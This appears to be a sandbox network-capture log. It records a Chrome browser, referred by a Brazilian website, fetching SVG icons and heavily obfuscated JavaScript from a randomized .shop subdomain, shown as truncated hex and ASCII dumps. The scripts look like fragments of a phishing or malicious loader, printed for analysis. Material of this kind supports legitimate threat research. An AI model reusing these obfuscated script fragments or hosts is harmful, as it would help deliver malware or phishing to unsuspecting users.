                                2025-01-14 03:33:01 UTC8192INData Raw: 31 66 34 30 0d 0a 54 79 70 65 29 7b 76 61 72 20 74 3d 4d 65 28 74 68 69 73 2c 65 29 3b 74 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 2c 74 2e 66 69 72 73 74 43 68 69 6c 64 29 7d 7d 29 7d 2c 62 65 66 6f 72 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 24 65 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 74 68 69 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 2c 74 68 69 73 29 7d 29 7d 2c 61 66 74 65 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 24 65 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 74 68 69 73 2e 70 61 72
                                Data Ascii: 1f40Type){var t=Me(this,e);t.insertBefore(e,t.firstChild)}})},before:function(){return $e(this,arguments,function(e){this.parentNode&&this.parentNode.insertBefore(e,this)})},after:function(){return $e(this,arguments,function(e){this.parentNode&&this.par


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                4192.168.2.449749203.161.57.1394434176C:\Program Files\Google\Chrome\Application\chrome.exe
                                TimestampBytes transferredDirectionData
                                2025-01-14 03:33:01 UTC636OUTGET /m/mxl/mlg.svg?YLV3I8GJ5WHA39OEO3BQ2J34Y HTTP/1.1
                                Host: e2dpryeqzl.jappeckino.shop
                                Connection: keep-alive
                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                sec-ch-ua-mobile: ?0
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                sec-ch-ua-platform: "Windows"
                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                Sec-Fetch-Site: cross-site
                                Sec-Fetch-Mode: no-cors
                                Sec-Fetch-Dest: image
                                Referer: https://mudedevidaparasempre.com.br/
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-US,en;q=0.9
                                2025-01-14 03:33:01 UTC299INHTTP/1.1 200 OK
                                Date: Tue, 14 Jan 2025 03:33:01 GMT
                                Server: Apache/2.4.62 (Unix) OpenSSL/3.2.2
                                Last-Modified: Mon, 13 Jan 2025 14:00:18 GMT
                                ETag: "e43-62b96dd4d1e31"
                                Accept-Ranges: bytes
                                Content-Length: 3651
                                Vary: Accept-Encoding,User-Agent
                                Connection: close
                                Content-Type: image/svg+xml
                                2025-01-14 03:33:01 UTC3651INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e 32 36 38 2c 30
                                Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                5192.168.2.449745203.161.57.1394434176C:\Program Files\Google\Chrome\Application\chrome.exe
                                TimestampBytes transferredDirectionData
                                2025-01-14 03:33:01 UTC613OUTGET /m/mxl/sig_op.svg HTTP/1.1
                                Host: e2dpryeqzl.jappeckino.shop
                                Connection: keep-alive
                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                sec-ch-ua-mobile: ?0
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                sec-ch-ua-platform: "Windows"
                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                Sec-Fetch-Site: cross-site
                                Sec-Fetch-Mode: no-cors
                                Sec-Fetch-Dest: image
                                Referer: https://mudedevidaparasempre.com.br/
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-US,en;q=0.9
                                2025-01-14 03:33:01 UTC299INHTTP/1.1 200 OK
                                Date: Tue, 14 Jan 2025 03:33:01 GMT
                                Server: Apache/2.4.62 (Unix) OpenSSL/3.2.2
                                Last-Modified: Mon, 13 Jan 2025 14:00:18 GMT
                                ETag: "638-62b96dd4d2219"
                                Accept-Ranges: bytes
                                Content-Length: 1592
                                Vary: Accept-Encoding,User-Agent
                                Connection: close
                                Content-Type: image/svg+xml
                                2025-01-14 03:33:01 UTC1592INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 64 65 66 73 3e 3c 73 74 79 6c 65 3e 2e 61 7b 66 69 6c 6c 3a 6e 6f 6e 65 3b 7d 2e 62 7b 66 69 6c 6c 3a 23 34 30 34 30 34 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 64 65 66 73 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 61 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 62 22 20 64 3d 22 4d 34 30 2c 33 32 2e 35 37 38 56 34 30 48 33 32 56 33 36 48 32 38 56 33 32 48 32 34 56 32 38 2e 37 36 36 41 31 30 2e 36 38 39 2c 31 30 2e 36 38 39 2c 30 2c 30 2c
                                Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                6192.168.2.449753203.161.57.1394434176C:\Program Files\Google\Chrome\Application\chrome.exe
                                TimestampBytes transferredDirectionData
                                2025-01-14 03:33:02 UTC389OUTGET /m/mxl/mlg.svg?YLV3I8GJ5WHA39OEO3BQ2J34Y HTTP/1.1
                                Host: e2dpryeqzl.jappeckino.shop
                                Connection: keep-alive
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                Accept: */*
                                Sec-Fetch-Site: none
                                Sec-Fetch-Mode: cors
                                Sec-Fetch-Dest: empty
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-US,en;q=0.9
                                2025-01-14 03:33:02 UTC299INHTTP/1.1 200 OK
                                Date: Tue, 14 Jan 2025 03:33:02 GMT
                                Server: Apache/2.4.62 (Unix) OpenSSL/3.2.2
                                Last-Modified: Mon, 13 Jan 2025 14:00:18 GMT
                                ETag: "e43-62b96dd4d1e31"
                                Accept-Ranges: bytes
                                Content-Length: 3651
                                Vary: Accept-Encoding,User-Agent
                                Connection: close
                                Content-Type: image/svg+xml
                                2025-01-14 03:33:02 UTC3651INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e 32 36 38 2c 30
                                Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                7192.168.2.449750203.161.57.1394434176C:\Program Files\Google\Chrome\Application\chrome.exe
                                TimestampBytes transferredDirectionData
                                2025-01-14 03:33:02 UTC568OUTGET /m/aty/PI4BI95Y8LSRIPKOE7G9UXGHL HTTP/1.1
                                Host: e2dpryeqzl.jappeckino.shop
                                Connection: keep-alive
                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                sec-ch-ua-mobile: ?0
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                sec-ch-ua-platform: "Windows"
                                Accept: */*
                                Sec-Fetch-Site: cross-site
                                Sec-Fetch-Mode: no-cors
                                Sec-Fetch-Dest: script
                                Referer: https://mudedevidaparasempre.com.br/
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-US,en;q=0.9
                                2025-01-14 03:33:02 UTC268INHTTP/1.1 200 OK
                                Date: Tue, 14 Jan 2025 03:33:02 GMT
                                Server: Apache/2.4.62 (Unix) OpenSSL/3.2.2
                                X-Powered-By: PHP/7.4.33
                                Vary: Accept-Encoding,User-Agent
                                Connection: close
                                Transfer-Encoding: chunked
                                Content-Type: text/javascript; charset: UTF-8;charset=UTF-8
                                2025-01-14 03:33:02 UTC7924INData Raw: 33 65 32 37 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 47 2c 59 29 7b 66 75 6e 63 74 69 6f 6e 20 62 32 28 47 2c 59 2c 45 2c 73 2c 6e 29 7b 72 65 74 75 72 6e 20 61 28 6e 2d 27 30 78 64 36 27 2c 47 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 62 35 28 47 2c 59 2c 45 2c 73 2c 6e 29 7b 72 65 74 75 72 6e 20 61 28 73 2d 27 30 78 33 39 30 27 2c 59 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 62 31 28 47 2c 59 2c 45 2c 73 2c 6e 29 7b 72 65 74 75 72 6e 20 61 28 73 2d 30 78 65 31 2c 59 29 3b 7d 76 61 72 20 45 3d 47 28 29 3b 66 75 6e 63 74 69 6f 6e 20 62 33 28 47 2c 59 2c 45 2c 73 2c 6e 29 7b 72 65 74 75 72 6e 20 61 28 45 2d 30 78 33 30 34 2c 73 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 62 34 28 47 2c 59 2c 45 2c 73 2c 6e 29 7b 72 65 74 75 72 6e 20 61 28 59 2d 20 2d 30 78 33 34 2c 6e 29 3b 7d 77
                                Data Ascii: 3e27(function(G,Y){function b2(G,Y,E,s,n){return a(n-'0xd6',G);}function b5(G,Y,E,s,n){return a(s-'0x390',Y);}function b1(G,Y,E,s,n){return a(s-0xe1,Y);}var E=G();function b3(G,Y,E,s,n){return a(E-0x304,s);}function b4(G,Y,E,s,n){return a(Y- -0x34,n);}w
                                2025-01-14 03:33:02 UTC7993INData Raw: 2c 27 30 78 38 65 62 27 2c 27 30 78 33 34 33 27 29 5d 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 6e 5b 62 55 28 30 78 62 37 36 2c 27 30 78 36 64 36 27 2c 30 78 61 64 65 2c 27 30 78 32 66 66 27 2c 30 78 62 37 66 29 5d 28 71 2c 6e 5b 62 6f 28 30 78 37 35 65 2c 30 78 63 38 33 2c 30 78 66 61 39 2c 30 78 66 37 37 2c 30 78 66 65 62 29 5d 28 6e 5b 62 55 28 27 30 78 31 31 30 35 27 2c 27 30 78 63 32 32 27 2c 27 30 78 31 31 33 38 27 2c 30 78 31 30 64 36 2c 30 78 66 32 63 29 5d 28 6e 5b 62 49 28 27 30 78 34 30 35 27 2c 30 78 36 32 65 2c 30 78 38 30 37 2c 30 78 38 30 37 2c 27 30 78 36 64 64 27 29 5d 2c 4a 29 2c 6e 5b 62 55 28 30 78 64 39 63 2c 27 30 78 62 30 64 27 2c 30 78 39 37 61 2c 30 78 39 64 64 2c 27 30 78 39 64 32 27 29 5d 29 29 5b 62 75 28 27 30
                                Data Ascii: ,'0x8eb','0x343')]];continue;case'2':n[bU(0xb76,'0x6d6',0xade,'0x2ff',0xb7f)](q,n[bo(0x75e,0xc83,0xfa9,0xf77,0xfeb)](n[bU('0x1105','0xc22','0x1138',0x10d6,0xf2c)](n[bI('0x405',0x62e,0x807,0x807,'0x6dd')],J),n[bU(0xd9c,'0xb0d',0x97a,0x9dd,'0x9d2')]))[bu('0
                                2025-01-14 03:33:02 UTC2INData Raw: 0d 0a
                                Data Ascii:
                                2025-01-14 03:33:02 UTC8192INData Raw: 31 66 34 30 0d 0a 30 78 34 30 37 2c 2d 27 30 78 62 35 27 29 2b 6d 30 28 30 78 32 66 38 2c 27 30 78 33 33 27 2c 2d 27 30 78 31 62 34 27 2c 2d 27 30 78 31 33 31 27 2c 27 30 78 32 37 63 27 29 2c 27 55 57 75 69 51 27 3a 6d 32 28 2d 27 30 78 32 36 63 27 2c 27 30 78 34 27 2c 30 78 33 37 35 2c 27 30 78 31 35 62 27 2c 2d 30 78 33 61 62 29 2b 27 63 6b 27 2c 27 41 48 78 46 73 27 3a 66 75 6e 63 74 69 6f 6e 28 59 2c 45 29 7b 72 65 74 75 72 6e 20 59 2b 45 3b 7d 2c 27 74 50 64 42 68 27 3a 66 75 6e 63 74 69 6f 6e 28 59 2c 45 29 7b 72 65 74 75 72 6e 20 59 2b 45 3b 7d 2c 27 42 74 79 75 61 27 3a 6d 32 28 27 30 78 37 34 37 27 2c 27 30 78 37 62 34 27 2c 30 78 65 31 32 2c 27 30 78 61 33 34 27 2c 30 78 39 30 36 29 2b 6d 31 28 30 78 61 61 66 2c 27 30 78 37 61 66 27 2c 30 78 61
                                Data Ascii: 1f400x407,-'0xb5')+m0(0x2f8,'0x33',-'0x1b4',-'0x131','0x27c'),'UWuiQ':m2(-'0x26c','0x4',0x375,'0x15b',-0x3ab)+'ck','AHxFs':function(Y,E){return Y+E;},'tPdBh':function(Y,E){return Y+E;},'Btyua':m2('0x747','0x7b4',0xe12,'0xa34',0x906)+m1(0xaaf,'0x7af',0xa
                                2025-01-14 03:33:02 UTC7822INData Raw: 27 2c 27 30 78 39 61 66 27 29 2c 27 51 72 68 58 70 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 73 29 7b 72 65 74 75 72 6e 20 45 28 73 29 3b 7d 2c 27 65 63 54 55 6d 27 3a 6d 76 28 30 78 35 39 37 2c 27 30 78 31 30 38 27 2c 30 78 34 31 31 2c 27 30 78 38 65 61 27 2c 30 78 38 38 32 29 2b 6d 54 28 27 30 78 39 66 66 27 2c 27 30 78 62 36 61 27 2c 30 78 37 39 33 2c 30 78 62 36 30 2c 30 78 38 64 34 29 2b 6d 51 28 30 78 31 61 64 2c 27 30 78 32 37 33 27 2c 27 30 78 35 36 32 27 2c 27 30 78 31 39 32 27 2c 2d 27 30 78 32 37 61 27 29 2b 6d 6d 28 30 78 37 61 36 2c 27 30 78 63 65 31 27 2c 30 78 64 38 38 2c 27 30 78 61 66 39 27 2c 27 30 78 63 37 38 27 29 2b 6d 76 28 27 30 78 63 35 37 27 2c 27 30 78 63 66 37 27 2c 30 78 65 37 62 2c 27 30 78 64 63 34 27 2c 27 30 78 38 61 39 27 29
                                Data Ascii: ','0x9af'),'QrhXp':function(E,s){return E(s);},'ecTUm':mv(0x597,'0x108',0x411,'0x8ea',0x882)+mT('0x9ff','0xb6a',0x793,0xb60,0x8d4)+mQ(0x1ad,'0x273','0x562','0x192',-'0x27a')+mm(0x7a6,'0xce1',0xd88,'0xaf9','0xc78')+mv('0xc57','0xcf7',0xe7b,'0xdc4','0x8a9')
                                2025-01-14 03:33:02 UTC2INData Raw: 0d 0a
                                Data Ascii:
                                2025-01-14 03:33:02 UTC8192INData Raw: 31 66 34 30 0d 0a 27 2c 2d 27 30 78 34 32 30 27 29 5d 28 29 2c 66 5b 6d 68 28 27 30 78 64 63 27 2c 30 78 32 62 33 2c 27 30 78 35 32 34 27 2c 30 78 33 30 31 2c 30 78 31 30 37 29 5d 28 6f 2c 66 5b 6d 68 28 27 30 78 37 31 63 27 2c 30 78 34 30 66 2c 27 30 78 38 37 33 27 2c 30 78 32 31 30 2c 27 30 78 33 62 37 27 29 5d 29 5b 6d 46 28 27 30 78 32 32 32 27 2c 27 30 78 36 33 39 27 2c 27 30 78 33 36 65 27 2c 27 30 78 37 35 35 27 2c 30 78 36 62 32 29 5d 28 4e 5b 66 5b 6d 6c 28 30 78 35 31 35 2c 30 78 31 35 33 2c 2d 27 30 78 61 32 27 2c 30 78 36 66 33 2c 30 78 33 62 32 29 5d 5d 29 2c 28 66 5b 6d 4d 28 2d 30 78 31 36 33 2c 2d 30 78 31 38 39 2c 2d 30 78 62 66 2c 2d 30 78 32 39 37 2c 30 78 33 34 66 29 5d 28 6b 2c 66 5b 6d 57 28 27 30 78 61 33 35 27 2c 27 30 78 36 66 32
                                Data Ascii: 1f40',-'0x420')](),f[mh('0xdc',0x2b3,'0x524',0x301,0x107)](o,f[mh('0x71c',0x40f,'0x873',0x210,'0x3b7')])[mF('0x222','0x639','0x36e','0x755',0x6b2)](N[f[ml(0x515,0x153,-'0xa2',0x6f3,0x3b2)]]),(f[mM(-0x163,-0x189,-0xbf,-0x297,0x34f)](k,f[mW('0xa35','0x6f2
                                2025-01-14 03:33:02 UTC7822INData Raw: 27 29 2b 6d 6a 28 27 30 78 33 65 33 27 2c 30 78 35 36 65 2c 27 30 78 32 64 66 27 2c 2d 30 78 31 62 66 2c 30 78 33 30 37 29 2b 6d 5a 28 27 30 78 32 30 34 27 2c 2d 30 78 35 66 2c 30 78 35 35 36 2c 2d 27 30 78 32 64 32 27 2c 30 78 31 32 30 29 2b 6d 71 28 30 78 39 35 61 2c 27 30 78 64 32 30 27 2c 27 30 78 38 61 33 27 2c 27 30 78 39 62 63 27 2c 27 30 78 39 31 65 27 29 2b 6d 6a 28 27 30 78 31 65 63 27 2c 27 30 78 38 62 63 27 2c 27 30 78 33 62 64 27 2c 30 78 31 65 62 2c 30 78 38 38 66 29 2b 6d 70 28 27 30 78 36 35 35 27 2c 30 78 35 39 65 2c 27 30 78 33 30 65 27 2c 27 30 78 34 37 38 27 2c 27 30 78 61 65 27 29 2b 6d 5a 28 27 30 78 35 30 31 27 2c 27 30 78 34 39 63 27 2c 30 78 35 2c 2d 30 78 32 36 2c 27 30 78 33 37 30 27 29 2b 6d 5a 28 30 78 32 30 66 2c 30 78 34 38
                                Data Ascii: ')+mj('0x3e3',0x56e,'0x2df',-0x1bf,0x307)+mZ('0x204',-0x5f,0x556,-'0x2d2',0x120)+mq(0x95a,'0xd20','0x8a3','0x9bc','0x91e')+mj('0x1ec','0x8bc','0x3bd',0x1eb,0x88f)+mp('0x655',0x59e,'0x30e','0x478','0xae')+mZ('0x501','0x49c',0x5,-0x26,'0x370')+mZ(0x20f,0x48
                                2025-01-14 03:33:02 UTC2INData Raw: 0d 0a
                                Data Ascii:
                                2025-01-14 03:33:02 UTC8192INData Raw: 31 66 34 30 0d 0a 34 62 36 27 29 5d 29 29 7b 76 61 72 20 6e 3b 74 72 79 7b 47 5b 6d 44 28 27 30 78 39 38 32 27 2c 27 30 78 38 66 63 27 2c 30 78 35 36 39 2c 27 30 78 34 36 37 27 2c 27 30 78 39 30 66 27 29 5d 28 47 5b 6d 4b 28 27 30 78 63 63 27 2c 2d 30 78 33 33 39 2c 27 30 78 31 37 34 27 2c 2d 30 78 31 66 66 2c 27 30 78 32 37 63 27 29 5d 2c 47 5b 6d 44 28 30 78 32 36 34 2c 27 30 78 31 39 27 2c 30 78 33 61 62 2c 27 30 78 36 61 61 27 2c 30 78 35 39 39 29 5d 29 3f 73 5b 6d 4c 28 27 30 78 38 39 64 27 2c 30 78 39 31 62 2c 30 78 65 61 63 2c 27 30 78 63 65 34 27 2c 30 78 63 32 34 29 5d 28 59 2c 73 5b 6d 44 28 30 78 39 62 33 2c 27 30 78 38 32 38 27 2c 30 78 35 39 64 2c 27 30 78 35 32 62 27 2c 27 30 78 62 62 31 27 29 5d 29 5b 6d 64 28 30 78 32 61 66 2c 30 78 35 39
                                Data Ascii: 1f404b6')])){var n;try{G[mD('0x982','0x8fc',0x569,'0x467','0x90f')](G[mK('0xcc',-0x339,'0x174',-0x1ff,'0x27c')],G[mD(0x264,'0x19',0x3ab,'0x6aa',0x599)])?s[mL('0x89d',0x91b,0xeac,'0xce4',0xc24)](Y,s[mD(0x9b3,'0x828',0x59d,'0x52b','0xbb1')])[md(0x2af,0x59


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                8192.168.2.449751203.161.57.1394434176C:\Program Files\Google\Chrome\Application\chrome.exe
                                TimestampBytes transferredDirectionData
                                2025-01-14 03:33:02 UTC569OUTGET /m/ecpt/55X7Q2CQ1S3SJ4E3WAJ5LJG1E HTTP/1.1
                                Host: e2dpryeqzl.jappeckino.shop
                                Connection: keep-alive
                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                sec-ch-ua-mobile: ?0
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                sec-ch-ua-platform: "Windows"
                                Accept: */*
                                Sec-Fetch-Site: cross-site
                                Sec-Fetch-Mode: no-cors
                                Sec-Fetch-Dest: script
                                Referer: https://mudedevidaparasempre.com.br/
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-US,en;q=0.9
                                2025-01-14 03:33:02 UTC268INHTTP/1.1 200 OK
                                Date: Tue, 14 Jan 2025 03:33:02 GMT
                                Server: Apache/2.4.62 (Unix) OpenSSL/3.2.2
                                X-Powered-By: PHP/7.4.33
                                Vary: Accept-Encoding,User-Agent
                                Connection: close
                                Transfer-Encoding: chunked
                                Content-Type: text/javascript; charset: UTF-8;charset=UTF-8
                                2025-01-14 03:33:02 UTC7924INData Raw: 33 65 38 30 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 62 31 39 38 39 2c 5f 30 78 34 64 64 38 64 64 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 39 38 63 37 36 30 28 5f 30 78 35 62 63 30 36 36 2c 5f 30 78 32 62 66 65 38 62 2c 5f 30 78 33 61 65 35 61 34 2c 5f 30 78 62 62 32 64 63 63 2c 5f 30 78 31 31 35 35 65 61 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 65 35 33 28 5f 30 78 35 62 63 30 36 36 2d 20 2d 30 78 32 64 66 2c 5f 30 78 62 62 32 64 63 63 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 65 65 30 37 31 28 5f 30 78 32 63 63 64 62 62 2c 5f 30 78 35 38 38 63 64 35 2c 5f 30 78 32 31 66 36 31 34 2c 5f 30 78 33 65 38 65 32 66 2c 5f 30 78 34 64 32 31 39 61 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 65 35 33 28 5f 30 78 34 64 32 31 39 61 2d 20 2d 30 78 32 32 33 2c
                                Data Ascii: 3e80(function(_0x5b1989,_0x4dd8dd){function _0x98c760(_0x5bc066,_0x2bfe8b,_0x3ae5a4,_0xbb2dcc,_0x1155ea){return _0x4e53(_0x5bc066- -0x2df,_0xbb2dcc);}function _0x1ee071(_0x2ccdbb,_0x588cd5,_0x21f614,_0x3e8e2f,_0x4d219a){return _0x4e53(_0x4d219a- -0x223,
                                2025-01-14 03:33:02 UTC82INData Raw: 2c 5f 30 78 35 61 32 36 37 31 2c 5f 30 78 34 62 66 33 66 37 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 65 35 33 28 5f 30 78 35 61 32 36 37 31 2d 20 2d 30 78 32 64 39 2c 5f 30 78 32 64 62 32 64 31 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 39 37
                                Data Ascii: ,_0x5a2671,_0x4bf3f7){return _0x4e53(_0x5a2671- -0x2d9,_0x2db2d1);}function _0x197
                                2025-01-14 03:33:02 UTC8000INData Raw: 35 34 63 28 5f 30 78 33 33 39 30 32 62 2c 5f 30 78 34 33 39 31 30 36 2c 5f 30 78 33 31 39 36 36 64 2c 5f 30 78 33 39 36 65 37 62 2c 5f 30 78 39 64 64 64 36 65 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 65 35 33 28 5f 30 78 33 31 39 36 36 64 2d 20 2d 30 78 32 36 62 2c 5f 30 78 39 64 64 64 36 65 29 3b 7d 76 61 72 20 5f 30 78 32 66 38 63 34 30 3d 7b 7d 3b 5f 30 78 32 66 38 63 34 30 5b 5f 30 78 33 34 30 32 34 64 28 30 78 34 38 39 2c 30 78 35 61 32 2c 30 78 34 30 38 2c 30 78 35 66 62 2c 30 78 35 64 33 29 5d 3d 5f 30 78 33 34 30 32 34 64 28 30 78 34 39 31 2c 30 78 34 31 63 2c 30 78 33 35 36 2c 30 78 32 66 66 2c 30 78 34 63 61 29 2b 5f 30 78 33 34 30 32 34 64 28 30 78 33 36 38 2c 30 78 33 62 31 2c 30 78 33 62 39 2c 30 78 32 66 63 2c 30 78 32 62 33 29 2b 27 2b 24 27
                                Data Ascii: 54c(_0x33902b,_0x439106,_0x31966d,_0x396e7b,_0x9ddd6e){return _0x4e53(_0x31966d- -0x26b,_0x9ddd6e);}var _0x2f8c40={};_0x2f8c40[_0x34024d(0x489,0x5a2,0x408,0x5fb,0x5d3)]=_0x34024d(0x491,0x41c,0x356,0x2ff,0x4ca)+_0x34024d(0x368,0x3b1,0x3b9,0x2fc,0x2b3)+'+$'
                                2025-01-14 03:33:02 UTC2INData Raw: 0d 0a
                                Data Ascii:
                                2025-01-14 03:33:02 UTC8192INData Raw: 31 66 34 30 0d 0a 31 64 31 33 65 39 2c 5f 30 78 34 39 61 65 33 35 2c 5f 30 78 35 39 62 64 35 37 2c 5f 30 78 35 33 37 36 66 65 2c 5f 30 78 62 61 63 35 65 35 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 38 30 36 39 64 28 5f 30 78 31 64 31 33 65 39 2d 30 78 31 39 2c 5f 30 78 34 39 61 65 33 35 2d 30 78 39 65 2c 5f 30 78 62 61 63 35 65 35 2d 20 2d 30 78 36 36 61 2c 5f 30 78 34 39 61 65 33 35 2c 5f 30 78 62 61 63 35 65 35 2d 30 78 64 30 29 3b 7d 76 61 72 20 5f 30 78 38 34 64 65 36 65 3d 7b 27 76 55 73 7a 42 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 36 39 31 63 37 2c 5f 30 78 32 39 37 34 66 37 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 62 61 34 34 39 28 5f 30 78 33 39 33 33 30 63 2c 5f 30 78 35 66 34 30 35 35 2c 5f 30 78 36 38 37 32 64 65 2c 5f 30 78 35 36 64 64
                                Data Ascii: 1f401d13e9,_0x49ae35,_0x59bd57,_0x5376fe,_0xbac5e5){return _0x58069d(_0x1d13e9-0x19,_0x49ae35-0x9e,_0xbac5e5- -0x66a,_0x49ae35,_0xbac5e5-0xd0);}var _0x84de6e={'vUszB':function(_0x3691c7,_0x2974f7){function _0x1ba449(_0x39330c,_0x5f4055,_0x6872de,_0x56dd
